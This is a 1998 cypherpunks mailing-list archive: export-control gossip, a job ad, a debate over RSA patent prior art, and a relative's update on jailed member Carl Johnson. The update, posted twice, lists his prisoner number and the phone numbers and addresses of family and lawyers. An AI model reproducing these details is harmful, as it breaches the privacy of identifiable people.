The most difficult struggle of all is the one within ourselves. Let us not
get accustomed and adjusted to these conditions. The one who adjusts ceases
to discriminate between good and evil.  He becomes a slave in body and
soul. Whatever may happen to you, remember always: Don't adjust! Revolt
against the reality! -- Mordechai Anielewicz, Warsaw, 1943

* * *

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 18 Nov 1998 22:14:41 +0800
To: "William H. Geiger III" <rah@shipwright.com>
Subject: Re: FC: More on Network Associates and its crypto-politics
In-Reply-To: <v04020a04b277c6d69429@[139.167.130.246]>
Message-ID: <199811181350.FAA27641@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



William -- your speculation may be true, but for now we can settle for
fact: they do support export controls. It makes sense, too: export ctrls
create an artificial market for key recovery crypto, which TIS will be
happy to sell to you.

-Declan


At 04:26 AM 11-18-98 -0500, William H. Geiger III wrote:
>In <v04020a04b277c6d69429@[139.167.130.246]>, on 11/17/98 
>   at 07:35 PM, Robert Hettinga <rah@shipwright.com> said:
>
>>TIS supports export controls on encryption products. My article:
>> http://www.well.com/user/declan/pubs/cwd.shadow.cryptocrats.0298.txt
>
>I doubt that TIS really cares one way or the other so long as they keep
their fat government contracts. Of course those same contracts require
keeping the government happy (ie: supporting GAK), TIS and others (being
the corporate whores that they are) will sell out their own mothers (and
the rest of us along with them) if it looked good on the bottom line.
>
>A real shame that PGP had to get mixed up with these vipers.
>
>-- 
>---------------------------------------------------------------
>William H. Geiger III  http://www.openpgp.net
>Geiger Consulting    Cooking With Warp 4.0
>
>Author of E-Secure - PGP Front End for MR/2 Ice
>PGP & MR/2 the only way for secure e-mail.
>OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
>---------------------------------------------------------------
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 915604@candseek.com
Date: Thu, 19 Nov 1998 02:51:17 +0800
To: cypherpunks@toad.com
Subject: JOBOP Systems Engineer
Message-ID: <199811181800.KAA07960@toad.com>
MIME-Version: 1.0
Content-Type: text/plain




Since your email address was listed on a related web site page 
or database, I thought you might help. I am seeking an individual 
within the following conditions:

I am working for one of the leading technology software companies 
in the Business software industry. We are seeking people experienced 
in Unix system and/or Windows NT administration. This person 
will work in any of three areas (New Jersey, Pennsylvania and Ohio) 
They will join either of two groups; Systems Engineering or Post 
Sales Implementation. This position requires; 3-5 years experience 
with Unix and/or Windows NT administration, prior experience in 
project management or pre-sales support of software product, 
excellent communication skills, a solid understanding of network 
management, GREEN CARD (minimum) and ability to travel within 
a well-defined territory(and occasionally, outside the territory). 

We offer an opportunity to become involved with leading edge 
technology, and excellent compensation package (to $80,000 plus bonus), 
outstanding benefits (including company paid medical and dental, 401K, 
tuition reimbursement etc.), outstanding working environment and 
an opportunity to work for one of the largest, most recognizable companies in the software 
industry .

Geographic Location of Position: New Jersey, Pennsylvania or Ohio

If you know anyone that might be interested, please forward this 
to them or contact:

Dave Eide
Quest_IT
Voice: 609-584-9000 ext. 273
Fax: 609-584-9575
Email: 915604@candseek.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 19 Nov 1998 00:34:19 +0800
To: cypherpunks@toad.com
Subject: CJ Update
Message-ID: <199811181521.KAA16375@smtp2.atl.mindspring.net>
MIME-Version: 1.0
Content-Type: text/plain



Received today by e-mail:

November 16, 1998
Springfield, Missouri

To:  friends of Carl Johnson, The Last Canadian
Outlaw (name of his last album)

From:   Alia Johnson

I saw CJ today at the Springfield facility for the
criminally disturbing. We spent five hours, a lot of
laughing, a little crying, and talking, with lots of
cameras and mikes on us. The controllers would not
let me take notes!

First, CJ's great hope and request to his friends is
to hang in there with him. He intends to go all the
way with this to trial, being his own defense lawyer,
even though he believes that since the Feds know they
will lose, they will try to get him to plea bargain
down to "walking his dog without a leash" as he puts
it. He is definitely on a mission.  He received
John's package, nothing from Declan. He has received
about half the mail I sent him. They are reading his
mail to his lawyers, supposedly forbidden.

CJ has been without glasses and without his teeth for
the whole time since he was arrested. JEFF GORDON
STILL HAS CJ'S TEETH. However, his vision has
improved! He is also without proper medication for
his Tourette's. The shrink told him that the
amphetamines he had been prescribed and which were
working well would probably be stolen by the staff
anyway. CJ is very conscious of managing his
neurological condition, with coffee, sugar, fasting,
and self-control. He does complain that he was so
pleased with himself that he got through his last
rage attack without hurting himself or acting it out
that he punched a wall in celebration and hurt his
hand! 

Even though he is supposed to be his own lawyer, he
has not even been informed about his indictment nor
has he been informed about anything else about his
case.

At Springfield he has been in lockup for things that
he purportedly did at the Florence, Arizona prison.
The shrink gets a message this past weekend that
suddenly I am coming down, and this morning before I
get there he rushes in to tell CJ he's finally moving
him out of lockup into the open ward! Wolfson later
tells me that over two weeks ago he notified the
federal marshalls that CJ can be moved back to
Arizona, but he had not told CJ that.  I don't know
whether it's true.  He actually took me to task for
coming on such short notice.

CJ was very happy that the things he has sent out
have been posted, and it is clear that the support of
the cypherpunks community is important to him.

He did not talk to me about particular defense
strategies for obvious reasons.

He did indicate that the story that I relayed to John
about the incident in the federal courthouse in
Estevan involving a supposed gasoline "bomb"  (a
version of which incident was part of a story by
Declan) was a surprise to him;  he seemed both 
surprised and amused about what actions had been
attributed to him. To say I know and understand
nothing about this incident is an understatement. I
mention  it only because it is part of Jeff Gordon's
original complaint, a significant part I assume since
CJ has never been known to do physical injury to a
human being.

CJ has not seen the stories by Declan nor what has
been posted; I sent a hundred pages of stuff to Larry
Dowling his Austin lawyer, including copies of
Declan's articles. I had not sent these things to CJ
on the assumption that they would be censored. CJ
suggested that I ask Dowling to sent them with the
instruction on the envelope "open in the presence of
the inmate only". Again, he wants to see these things
because  his spirit is hanging on the support from
John and the rest of the community, although he said
very clearly that he is doing this on his own and
would do it alone if he had to.

Just before I left to come here, having finally been
cleared as a visitor, I got a call from Linda Lou
Reed, saying that she had not done a couple of things
needed to get his music CD together, since she has

been out of town. CJ and I talked about how to get
this together and I will work on it with other Tucson
friends. Someone had the idea of selling the CD's to
support a legal defense fund. I will report progress
as it occurs. 

And speaking of legal defense support, thanks to John
and others who made suggestions about legal support.
After many hours of discussion the family decided
that it was not the most intelligent thing to put up
the meagre family fortunes against the federal
government, and therefore we intend at this point to
trust CJ's defense to his stated (and historically
effective) plan to be his own defense, or to public
defenders. With some trepidation I brought this up to
CJ, and he was relieved; he said that he had been
worried that we would try to pay for a defense in
this case, which again he intends to push all the way
through no matter what compromises are offered to
him, and that our paying for his defense was not what
he wanted. 

Therefore I would like to put out to those who know
the situation to help CJ to obtain relevant legal
information and consultation as he goes into this, in
whatever form it is available.  If there are costs
that I personally can afford to support, I am happy
to. CJ has made repeated requests for access to legal
books at Springfield, and they disappear into
nowhere, no yes, no no. 

An interesting point:  CJ related that Dr. Wolfson
had asked him about his filing of IRS tax forms!  As
if they were on a fishing expedition looking for
other things to get CJ on, as they did with Jim Bell.
I confronted Wolfson about this, asking how it was
relevant to the issue Wolfson was supposed to be
investigating, which is CJ's competence to understand
the charges against him and to stand trial.  At that
exact moment he jumped up and said that he urgently
needed to answer a page which he had received five
minutes before. I overheard the conversation which he
had suddenly urgently to engage in, and it was a
trivial conversation about returning a copy of a
document to someone. But when he returned to me he
said "Well I have three reasons for having asked
that." Already suspicious, to have three reasons. The
main reason Wolfson said was that CJ says he has
attention deficient disorder (ADD) associated with
the Tourette's, and that asking if someone filed
taxes was a good indicator of their attention span!
(Could I be making this up?) I said, why not pick
something like, can you make it through the college
registration process? He replied, "I'm not used to
working with educated people."  Other "reasons" he
gave:  1) I want to give a thorough medical,
psychological, social and legal picture as part of my
judgment whether someone is capable of understanding
the charges against him, because if I leave
significant things out of my report I am more likely
to be receiving a subpoena to wherever CJ is being
tried, and that's inconvenient for me; and 2) there
are all these wacko people who question the authority
of government to levy taxes, put people to trial,
etc., and I need to determine whether he's one of
those and therefore suffering as part of a mass
delusion (his words)... he lost me there a little
bit. I didn't know whether that would be evidence of
sanity or insanity.

Anyway he seems to be sending off CJ into the next
stage with a report that CJ might have Tourette's, is
not schizophrenic, and in his experience is not
dangerous.

CJ does have some mighty interesting observations
about how things are done in this federal nuthouse
situation, which god willing we will all get to hear
someday. Meanwhile he has sent out certain
information to Declan on specific incidents in the
facility which he observed,  but is concerned that it
was not received.

Our expectation is that CJ will be returned to Tucson
and then extradited to Washington, but clearly as a
form of harrassment the marshalls are taking their
own sweet time about everything.

CJ's "case manager" at Springfeld is Bob Harris. The
phone number there is 417 862 7041, and CJ's prisoner
number is 05987-196. Any correspondence to anywhere
in the prison system needs to have that number on it.
John Bogart in Tucson  (520 624 8196) is the public
defender in CJ's local case, pending his extradition
to Washington state.  The family retained Larry
Dowling in Austin, a very old friend of CJ's and his
lawyer for a long time, for a small amount to look
after CJ's rights during incarceration; we have not
retained him to go the full way in this defense, for
the reasons stated above.  Supposedly John Bogart
will be informed when the marshalls actually choose
to move CJ (after the fact).  Therefore I suggest
that those who want to write to CJ write him soon and
by fast mail at U.S. Medical Center, POB Box 4000, 
Springfield, Missouri 65801.   Larry Dowling's
address is 606 West 11th, Austin, 78701. I assume he
might be willing  to forward it to CJ on the
assumption that CJ will in fact be moved. Larry has
been a true friend throughout this and past
tribulations.

CJ has said that since he has been incarcerated for
three months now with no indication to him as to
formal charges, it is time to act to get him out of
Springfield. I concur, and unless I hear within a
week that he is being moved, I will take some of the
cypherpunk friends up on their offer to begin to
address this case through the local ACLU.  CJ's
greatest fear is that he will do something that will
justify involuntary drug administration, and he will
be defeated in that way. He is also afraid that he
will simply be killed in prison.

However, all in all I found CJ in pretty good
spirits, and clearly feeling "on purpose" vis a vis
his goals with his cypherpunk activities. I related
to him during our talk that one of my sons just took
some time off from university so that he would have
time to actually read, and that he had accurately
predicted to his friends exactly how I would respond
to the news: "Honey, I'm so proud!" CJ said that's
how I seemed to feel now about his arrest.  It is,
finally. I trust that CJ, in spite of a pattern of
sometimes shooting himself in the foot, is
brilliantly inspired by important libertarian values
and goals. I appreciate the education and inspiration
I have gained from getting to know this side of his
life and some of the people, technologies, issues and
ideas of which previously I had only vague notions.


Alia Johnson (lodi@well.com) my phone 510 548 2008;
my fax 510 848 7842.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 19 Nov 1998 00:53:48 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: CJ Update Corrected (fwd)
Message-ID: <199811181618.KAA19330@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 18 Nov 1998 10:30:56 -0500
> From: John Young <jya@pipeline.com>
> Subject: CJ Update Corrected

> This is attorney protected information.

Not now.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 19 Nov 1998 00:43:12 +0800
To: cypherpunks@toad.com
Subject: CJ Update Corrected
Message-ID: <199811181540.KAA25521@smtp2.atl.mindspring.net>
MIME-Version: 1.0
Content-Type: text/plain



This is attorney protected information.

Received today by e-mail:

November 16, 1998
Springfield, Missouri

To:  friends of Carl Johnson, The Last Canadian
Outlaw (name of his last album)

From:   Alia Johnson

I saw CJ today at the Springfield facility for the
criminally disturbing. We spent five hours, a lot of
laughing, a little crying, and talking, with lots of
cameras and mikes on us. The controllers would not
let me take notes!

First, CJ's great hope and request to his friends is
to hang in there with him. He intends to go all the
way with this to trial, being his own defense lawyer,
even though he believes that since the Feds know they
will lose, they will try to get him to plea bargain
down to "walking his dog without a leash" as he puts
it. He is definitely on a mission.  He received
John's package, nothing from Declan. He has received
about half the mail I sent him. They are reading his
mail to his lawyers, supposedly forbidden.

CJ has been without glasses and without his teeth for
the whole time since he was arrested. JEFF GORDON
STILL HAS CJ'S TEETH. However, his vision has
improved! He is also without proper medication for
his Tourette's. The shrink told him that the
amphetamines he had been prescribed and which were
working well would probably be stolen by the staff
anyway. CJ is very conscious of managing his
neurological condition, with coffee, sugar, fasting,
and self-control. He does complain that he was so
pleased with himself that he got through his last
rage attack without hurting himself or acting it out
that he punched a wall in celebration and hurt his
hand! 

Even though he is supposed to be his own lawyer, he
has not even been informed about his indictment nor
has he been informed about anything else about his
case.

At Springfield he has been in lockup for things that
he purportedly did at the Florence, Arizona prison.
The shrink gets a message this past weekend that
suddenly I am coming down, and this morning before I
get there he rushes in to tell CJ he's finally moving
him out of lockup into the open ward! Wolfson later
tells me that over two weeks ago he notified the
federal marshalls that CJ can be moved back to
Arizona, but he had not told CJ that.  I don't know
whether it's true.  He actually took me to task for
coming on such short notice.

CJ was very happy that the things he has sent out
have been posted, and it is clear that the support of
the cypherpunks community is important to him.

He did not talk to me about particular defense
strategies for obvious reasons.

He did indicate that the story that I relayed to John
about the incident in the federal courthouse in
Estevan involving a supposed gasoline "bomb"  (a
version of which incident was part of a story by
Declan) was a surprise to him;  he seemed both 
surprised and amused about what actions had been
attributed to him. To say I know and understand
nothing about this incident is an understatement. I
mention  it only because it is part of Jeff Gordon's
original complaint, a significant part I assume since
CJ has never been known to do physical injury to a
human being.

CJ has not seen the stories by Declan nor what has
been posted; I sent a hundred pages of stuff to Larry
Dowling his Austin lawyer, including copies of
Declan's articles. I had not sent these things to CJ
on the assumption that they would be censored. CJ
suggested that I ask Dowling to sent them with the
instruction on the envelope "open in the presence of
the inmate only". Again, he wants to see these things
because  his spirit is hanging on the support from
John and the rest of the community, although he said
very clearly that he is doing this on his own and
would do it alone if he had to.

Just before I left to come here, having finally been
cleared as a visitor, I got a call from Linda Lou
Reed, saying that she had not done a couple of things
needed to get his music CD together, since she has

been out of town. CJ and I talked about how to get
this together and I will work on it with other Tucson
friends. Someone had the idea of selling the CD's to
support a legal defense fund. I will report progress
as it occurs. 

And speaking of legal defense support, thanks to John
and others who made suggestions about legal support.
After many hours of discussion the family decided
that it was not the most intelligent thing to put up
the meagre family fortunes against the federal
government, and therefore we intend at this point to
trust CJ's defense to his stated (and historically
effective) plan to be his own defense, or to public
defenders. With some trepidation I brought this up to
CJ, and he was relieved; he said that he had been
worried that we would try to pay for a defense in
this case, which again he intends to push all the way
through no matter what compromises are offered to
him, and that our paying for his defense was not what
he wanted. 

Therefore I would like to put out to those who know
the situation to help CJ to obtain relevant legal
information and consultation as he goes into this, in
whatever form it is available.  If there are costs
that I personally can afford to support, I am happy
to. CJ has made repeated requests for access to legal
books at Springfield, and they disappear into
nowhere, no yes, no no. 

An interesting point:  CJ related that Dr. Wolfson
had asked him about his filing of IRS tax forms!  As
if they were on a fishing expedition looking for
other things to get CJ on, as they did with Jim Bell.
I confronted Wolfson about this, asking how it was
relevant to the issue Wolfson was supposed to be
investigating, which is CJ's competence to understand
the charges against him and to stand trial.  At that
exact moment he jumped up and said that he urgently
needed to answer a page which he had received five
minutes before. I overheard the conversation which he
had suddenly urgently to engage in, and it was a
trivial conversation about returning a copy of a
document to someone. But when he returned to me he
said "Well I have three reasons for having asked
that." Already suspicious, to have three reasons. The
main reason Wolfson said was that CJ says he has
attention deficient disorder (ADD) associated with
the Tourette's, and that asking if someone filed
taxes was a good indicator of their attention span!
(Could I be making this up?) I said, why not pick
something like, can you make it through the college
registration process? He replied, "I'm not used to
working with educated people."  Other "reasons" he
gave:  1) I want to give a thorough medical,
psychological, social and legal picture as part of my
judgment whether someone is capable of understanding
the charges against him, because if I leave
significant things out of my report I am more likely
to be receiving a subpoena to wherever CJ is being
tried, and that's inconvenient for me; and 2) there
are all these wacko people who question the authority
of government to levy taxes, put people to trial,
etc., and I need to determine whether he's one of
those and therefore suffering as part of a mass
delusion (his words)... he lost me there a little
bit. I didn't know whether that would be evidence of
sanity or insanity.

Anyway he seems to be sending off CJ into the next
stage with a report that CJ might have Tourette's, is
not schizophrenic, and in his experience is not
dangerous.

CJ does have some mighty interesting observations
about how things are done in this federal nuthouse
situation, which god willing we will all get to hear
someday. Meanwhile he has sent out certain
information to Declan on specific incidents in the
facility which he observed,  but is concerned that it
was not received.

Our expectation is that CJ will be returned to Tucson
and then extradited to Washington, but clearly as a
form of harrassment the marshalls are taking their
own sweet time about everything.

CJ's "case manager" at Springfeld is Bob Harris. The
phone number there is 417 862 7041, and CJ's prisoner
number is 05987-196. Any correspondence to anywhere
in the prison system needs to have that number on it.
John Bogart in Tucson  (520 624 8196) is the public
defender in CJ's local case, pending his extradition
to Washington state.  The family retained Larry
Dowling in Austin, a very old friend of CJ's and his
lawyer for a long time, for a small amount to look
after CJ's rights during incarceration; we have not
retained him to go the full way in this defense, for
the reasons stated above.  Supposedly John Bogart
will be informed when the marshalls actually choose
to move CJ (after the fact).  Therefore I suggest
that those who want to write to CJ write him soon and
by fast mail at U.S. Medical Center, POB Box 4000, 
Springfield, Missouri 65801.   Larry Dowling's
address is 606 West 11th, Austin, 78701. I assume he
might be willing  to forward it to CJ on the
assumption that CJ will in fact be moved. Larry has
been a true friend throughout this and past
tribulations.

CJ has said that since he has been incarcerated for
three months now with no indication to him as to
formal charges, it is time to act to get him out of
Springfield. I concur, and unless I hear within a
week that he is being moved, I will take some of the
cypherpunk friends up on their offer to begin to
address this case through the local ACLU.  CJ's
greatest fear is that he will do something that will
justify involuntary drug administration, and he will
be defeated in that way. He is also afraid that he
will simply be killed in prison.

However, all in all I found CJ in pretty good
spirits, and clearly feeling "on purpose" vis a vis
his goals with his cypherpunk activities. I related
to him during our talk that one of my sons just took
some time off from university so that he would have
time to actually read, and that he had accurately
predicted to his friends exactly how I would respond
to the news: "Honey, I'm so proud!" CJ said that's
how I seemed to feel now about his arrest.  It is,
finally. I trust that CJ, in spite of a pattern of
sometimes shooting himself in the foot, is
brilliantly inspired by important libertarian values
and goals. I appreciate the education and inspiration
I have gained from getting to know this side of his
life and some of the people, technologies, issues and
ideas of which previously I had only vague notions.


Alia Johnson (lodi@well.com) my phone 510 548 2008;
my fax 510 848 7842.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Thu, 19 Nov 1998 01:43:32 +0800
To: vin@shore.net>
Subject: RE: Rivest Patent
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F859D@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



Vin McLellan (or someone using his name), in an otherwise closely argued
posting,  subtly missed the point with:

[...snip...]

> I was never impressed by the absolutist argument against
> patents on math-based processes. Mr. Cordian summarized
> this POV: "The fact that the [RSA] patent couldn't be 
> successfully challenged even though its mathematical
> underpinnings were well known years prior reflects badly only
> upon the notion of mathematical patents, and hardly refutes the 
> facts in evidence." By that logic, it seems to me, a basic
> knowledge of physics could invalidate almost all patents
> for mechanical inventions.)

> [...snip...]
> 
The real point is surely  that a patent for a device invented by someone
with  a basic knowledge of physics is used to protect the *invention*
not the *knowledge*. They are not used to prevent anyone else inventing
another device using the same basic knowledge of physics. 

Even if it is perfectly just for the RSA (or any other) patent "taken as
a whole" to be used to protect  "not merely a disembodied mathematical
concept but rather a specific machine";  that *doesn''t* mean it is
neccessarily just to use the patent to protect that "disembodied
mathematical concept" when it is used in some other "specific machine".
But software patents *are* used to try to stop people employing the same
algorithms in other inventions. So, despite  the ingenuous  ruling of
the court they *are* being used to try to control "disembodied
mathematical concepts" - in other words ideas.

I have no idea if Watt had a patent on the steam governor. But I bet he
didn't try to take one out on Boyle's Law.


Ken Brown




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vin McLellan <vin@shore.net>
Date: Thu, 19 Nov 1998 01:48:05 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Rivest Patent
In-Reply-To: <v04003a05b2727f7cc22e@[198.115.179.81]>
Message-ID: <v04003a08b2766f984a7e@[198.115.179.81]>
MIME-Version: 1.0
Content-Type: text/plain



	Vin McLellan <vin@shore.net> wrote:

>> Now, it seems to me reasonable, albiet academic, to argue whether or not
>>software
>> should be patentable.  It is also certainly reasonable to argue whether
>>or not
>> cryptographic algorithms should be patentable.
>>
>> On the other hand, it seems to me unreasonable, willfully ill-informed,
>> and/or  malovelent to declare -- in the face of several judicial rulings
>> which have firmly ratified the RSA PKC patent -- that  "prior art" exists
>> which should have invalidated that patent.

	Eric Michael Cordian <emc@wire.insync.net> -- the "Nym" or
pseudonym for someone who says he is a group of people, and who has been
collecting  $500 donations from folks willing to help the Cordian Group
sponsor an algebraic attack on the DES (See the "DES Analytic Crack
Project" at http://www.cyberspace.org/~enoch/crakfaq.html) -- spun off an
individual voice to respond:

>Judicial rulings notwithstanding, a description of that which is now known
>as RSA Public Key Cryptography was published in a book of algorithms which
>pre-dated by quite a few years its patenting and commercial promotion by
>the current patent holders.

	When I read Cordian's claim, I asked Ron Rivest if he had ever
heard of such a thing.  Prof. Rivest was curious, but said was all news to
him. To the best of his knowledge, he said, there had never been anything
like a description of the RSA public key cryptosystem published prior to
the paper he, Adi Shamir and Len Adelman, published in April, 1977: "On
Digital Signatures and Public Key Cryptosystems."

	Last year, former Cylink attorney Pat Flinn suggested that one
possible  challenge to the RSA patent might be to highlight the similarity
between the RSA PKC and the Pohlig-Hellman crypto system, invented at
Stanford University in 1975. For an invention to be patentable, of course,
it must be useful, novel, and non-obvious. Flinn argued that the
reformulation of the Pohlig-Hellman algorithm with a modulus that was the
product of two prime numbers was a potentially "obvious" enhancement.

	But not even Pat Flinn claimed to know anything about a
"description of that which is now known as RSA Public Key Cryptography"
being published somewhere -- anywhere -- years before the RSA cryptosystem
was invented and named at MIT.

	As Matt Blaze pointed out, there have also been recent reports
about secret research into public-key cryptosystems by cryptographers
within the British cryptographic service, GCHQ, in the early 1970s.
According to former NSA Director Bobby Ray Inman, the NSA was working on
PKC even earlier. Until last December, when the Brits released a GCHQ
historical paper written by John Ellis in 1987, there had been little or no
unclassified information available about this pioneering research. See:
http://www.nytimes.com/library/cyber/week/122497encrypt.html   We still
don't know what was done at the NSA, by whom, and when. Secret government
R&D, however, is not really relevant to intellectual property claims on
public key crypto. Full publication of the details of an invention -- in
exchange for a limited-duration property right -- is really at the heart of
the patent process.  Except in extraordinary circumstances, the NSA doesn't
play in this league.

	In the commecial world, on the other hand, it's hard to think of
priceless information being kept secret (particularly when it is only worth
something if it is on a bargaining table.) In the lawsuits between
Stanford/Cylink and RSA Data Security over the scope and validity of the
Stanford and RSA patents, "obvious prior art" -- certainly evidence that
the RSA cryptosystem had been published by someone other than the MIT
inventors before 1977 -- would have been worth tens of millions of dollars.
It might have been potentially worth that much to Pat Flinn himself.

	Since I knew that no mention of such a document or book had ever
emerged in Cylink's multi-year campaign to invalidate the RSA patent, it
seemed a safe bet to challenge Mr. Cordian directly.

	"There was no such book. Cordian's statement is just not true," I
declared.

	Mr. Cordian replied with dry scorn:

>>> Only a complete moron would place himself in the position of trying to
>>> prove such an all-encompassing negative.

	(Not light of hand, our Mr. Cordian.  Yet not all negative
propositions are impossible to prove.  For the rest, I'll leave it to the
List and other readers to decide which of us deserves a Dunce Cap for
placing himself in an untenable position.)

	Mr. Cordian didn't press his initial argument that a cryptographic
algorithm, even if embodied in a pseudo-mechanical device or process,
doesn't deserve patent protection. Since 1981, the US Courts have allowed a
process which includes a mathematical algorithm to be patented  -- if the
algorithm is merely part of an otherwise patentable process. For the RSA
cryptosystem, this seems reasonably straightforward to those without a
religious bias.

	To quote the Federal Court in the Schlafly Case, affirmed by the
Circuit Court:

"Taken as a whole, the RSA patent is entitled to patent protection. The
claims of the patent make use of known structures, a communications
channel, an encoding device and a decoding device, to produce a practical
invention, i.e. a means for securely transmitting messages across an
insecure line. The messages are comprised of word signals that are
transformed from one state, plaintext, to another state, ciphertext, by the
patented invention. The word signals are then transmitted across an
insecure line and transformed by the decoding device from ciphertext into
plaintext. As such, the claimed invention is not merely a disembodied
mathematical concept but rather a specific machine designed to transform
and transmit word signals."

	(I was never impressed by the absolutist argument against patents
on math-based processes. Mr. Cordian summarized this POV: "The fact that
the [RSA] patent couldn't be successfully challenged even though its
mathematical underpinnings were well known years prior reflects badly only
upon the notion of mathematical patents, and hardly refutes the facts in
evidence." By that logic, it seems to me, a basic knowledge of physics
could invalidate almost all patents for mechanical inventions.)

	The second traditional attack upon the RSA public key cryptosystem,
noted above, is the charge that it was "obvious" or insufficiently novel.
Section 103 of the US Patent Act provides that a patent is invalid "if the
differences between the subject matter sought to be patented and the prior
art are such that the subject matter as a whole would have been obvious at
the time the invention was made to a person having ordinary skill in the
art...."

	If, as Mr. Cordian claimed, there was "a description of that which
is now known as RSA Public Key Cryptography" published in some book years
before the 1976 (re)discovery of the RSA cryptosystem by Rivest, Shamir,
and Adleman, it would have -- and clearly should have -- invalidated the
RSA patent under that rule.

	So what do we get when Mr. Cordian finally chooses to reveal to a
curious List the source of his amazing report that the RSA public key
cryptosystem was actually published in the _19th_ Century?

	Patrick J. Flinn!  Hey, what a surprise!

	As his hallowed source, Mr. Cordian cites a footnote from Flinn's
impassioned 1997 denunciation of the RSA patent in the Cyberlaw journal.

	Read one-time Cylink attorney Flinn at
http://www.cyberlaw.com/rsa.html (and a brisk bare-knuckle retort from Bob
Haslam, RSADSI's attorney, at http://www.cyberlaw.com/rthrsa.html.)

	Flinn led the team of patent and litigation lawyers that
represented Cylink Corporation in its suit against RSA Data Security Inc.
to determine the validity and scope of the RSA PKC patent after the breakup
of an early RSA/Cylink licensing partnership. In a separate case, Flinn's
team also represented Cylink and Stanford University against RSADSI in a
suit which sought to define the validity and scope of the so-called
Stanford patents: the Hellman-Merkle Patent and the Diffie-Hellman Patent.

	Critics of Flinn's Cyberlaw article characterized him as a one-time
Cylink gunslinger who had already failed in several attempts to invalidate
the RSA patent -- and who was finally bounced from the case in 1996 when
Cylink decided that further litigation was futile and potentially
disasterous. Cylink subsequently negotiated the purchase of a license for
the RSA public key cryptosystem from RSADSI.

	RSA's attorneys, as you might expect, rudely dismissed Flinn's
list of potential vulnerabilities in the RSA patent in Cyberlaw. They
pointed out that Flinn's arguments were being published, rather than heard
in a courtroom, because those same arguments had failed to impress several
judges and hearing officers.  "As a matter of fact," declared RSA attorney
Bob Haslam, "none of Mr. Flinn's three arguments about the supposed
invalidity of the RSA Patent have ever been remotely successful in actual
litigation."

	To its credit, Flinn's Cyberlaw article doesn't really try to be
anything but a determined advocate's last-ditch list of legal attacks that
might -- with a good tailwind behind them -- potentially chip, limit, or
even invalidate RSA's teflon-coated PKC patent.  Flinn's Cyberlaw
presentation drew notably unsympathetic responses from the law profs and IP
experts on the Cyberia mailing list -- although they seemed to admire his
style and gall in publishing a case he wasn't going to be allowed try
before a judge or jury.

	For all that, the pretentions of Flinn's Cyberlaw footnote on 19th
Century Mathematics turned out to be _far, far_ less than what Mr. Cordian
had claimed.

	Mr. Cordian must have discovered this when he went back and pulled
up his source data. Then -- to put it diplomatically -- Mr. Cordian seems
to have decided to flim-flam the List a little. Rather than admit an error,
a little over-enthusiasm in his recollection of the facts, Cordian decided
bluff it out.

	He quoted for us only the beginning of Flinn's footnote, and he
ignored the rest of the footnoted text -- which, quite inconveniently for
him, seemed to directly refute his initial claim.

	(A nymed net-gent like Mr. Cordian -- who hides his real identity
behind the Cordian pseudonym -- can perhaps risk his reputation a little
more carelessly than the rest of us. If he soils this one, after all, he
can just pony up for a new identity.)

	Wrote Mr. Cordian:

>Quoting "Cyberlaw":
>
>    "There are a number of references in the prior art, moreover,
>     to using the problem of factoring composite numbers in
>     cryptography, dating back to the 19th century.
>
>    "In 1870, a book by William S. Jevons described the
>     relationship of one-way functions to cryptography and went
>     on to discuss specifically the factorization problem used
>     to create the "trap-door" in the RSA system."

	Actually, the first line of Cordian's quote is from the main text
of Flinn's article: http://www.cyberlaw.com/rsa.html. The second line is
from Flinn's Footnote # 64.

	The _full_ text of Footnote # 64 reads as follows:

[64] In 1870, a book by William S. Jevons described the relationship of
one-way functions to cryptography and went on to discuss specifically the
factorization problem used to create the "trap-door" in the RSA system. In
July, 1996, one observer commented on the Jevons book in this way:

In his book The Principles of Science: A Treatise on Logic and Scientific
Method, written and published in the 1890's, William S. Jevons observed
that there are many situations where the 'direct' operation is relatively
easy, but the 'inverse' operation is significantly more difficult, One
example mentioned briefly is that enciphering (encryption) is easy while
deciphering (decryption) is not. In the same section of Chapter 7:
Introduction titled 'Induction an Inverse Operation', much more attention
is devoted to the principle that multiplication of integers is easy, but
finding the (prime) factors of the product is much harder. Thus, Jevons
anticipated a key feature of the RSA Algorithm for public key cryptography,
though he certainly did not invent the concept of public key cryptography.

Solomon W. Golomb, On Factoring Jevons' Number, CRYPTOLOGIA 243 (July 1996)
(emphasis added).

	<End of quoted text.>

	(The conflict between the 1870 and 1890 dates cited in different
paragraphs for the pub date of Jevon's "The Principles of Science" is as
published in the original Cyberlaw article. I have no explanation, but the
1870 date seems most likely.  William Stanley Jevons, an astonishingly
prolific American economist, philosopher, and logician, was born 1835 and
died in 1882. He is probably the W.S. Jevons cited here, but I can't be
sure since I can find this title among the list of Jevon books in the
Library of Congress.)

	The Cryptologia journal, unfortunately, is not yet available
